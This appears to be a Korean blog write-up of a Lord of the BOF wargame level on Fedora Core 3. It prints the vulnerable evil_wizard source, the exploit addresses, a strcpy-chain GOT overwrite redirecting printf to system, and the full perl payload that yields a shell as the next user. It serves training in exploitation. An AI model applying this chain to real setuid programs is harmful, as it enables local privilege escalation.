[LOB_FC3] hell_fire ->evil

#Env

- NX

- ascii armor

- random stack

#Technic

- got overwrite

- strcpy plt chain

evil_wizard.c 소스

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - evil_wizard
        - Local BOF on Fedora Core 3
        - hint : GOT overwriting
*/

// magic potion for you
void pop_pop_ret(void)
{
        asm("pop %eax");
        asm("pop %eax");
        asm("ret");
}

int main(int argc, char *argv[])
{
        char buffer[256];
        char saved_sfp[4];
        int length;

if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

// for disturbance RET sleding
        length = strlen(argv[1]);

// healing potion for you
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());

// save sfp
        memcpy(saved_sfp, buffer+264, 4);

// overflow!!
        strcpy(buffer, argv[1]);

// restore sfp
        memcpy(buffer+264, saved_sfp, 4);

// disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

printf("%s\n", buffer);
}

buffer+length 이후 값을 날려버려서 ret sled로 사용할 인자가 없어졌다. 다른 방법을 이용해야 하는데 힌트로 GOT overwriting라고 준다.

문제 바이너리에서 setreuid로 권한 설정도 해주므로 GOT overwrite로 system함수를 실행시키면 되겠다.

* printf의 got에 system함수를 덮도록 한다

- system()의 주소 : 0x7507c0

- print의 PLT : 0x8048424

- print GOT : 0x8049884

- pop-pop-ret : 0x0804854f (문제에서 제공)

- strcpy의 PLT : 0x8048494

- "/bin/sh"의 주소 : 0x833603

[ strcpy call chain 구성 ]

strcpy의 PLT | pop-pop-ret | print의 GOT | &(0xc0)

strcpy의 PLT | pop-pop-ret | print의 GOT+1 | &(0x07)

strcpy의 PLT | pop-pop-ret | print의 GOT+2 | &(0x75)

strcpy의 PLT | pop-pop-ret | print의 GOT+3 | &(0x00)

&system(print의 plt) | dummy | &"/bin/bash"

공격코드 : "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"

[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX輯봑?봑뀺봑녽봑$aaaa6?

sh-3.00$ id

uid=504(evil_wizard) gid=504(evil_wizard) groups=503(hell_fire) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 504

get down like that

sh-3.00$

저작자표시

'Wargame > LOB_FC' 카테고리의 다른 글

[LOB_FC3] dark_eyes ->hell_fire (0)	2014.07.12
[LOB_FC3] iron_golem -> dark_eyes (0)	2014.07.12
[LOB_FC3] gate ->iron_golem (0)	2014.07.05
[LOB_FC4] cruel -> enigma (0)	2012.08.24
[LOB_FC4] dark_stone -> cruel (0)	2012.08.20

bbolmin

[LOB_FC3] hell_fire ->evil_wizard

'Wargame > LOB_FC' 카테고리의 다른 글

티스토리툴바

[LOB_FC3] hell_fire ->evil_wizard

'Wargame > LOB_FC' 카테고리의 다른 글

관련글

티스토리툴바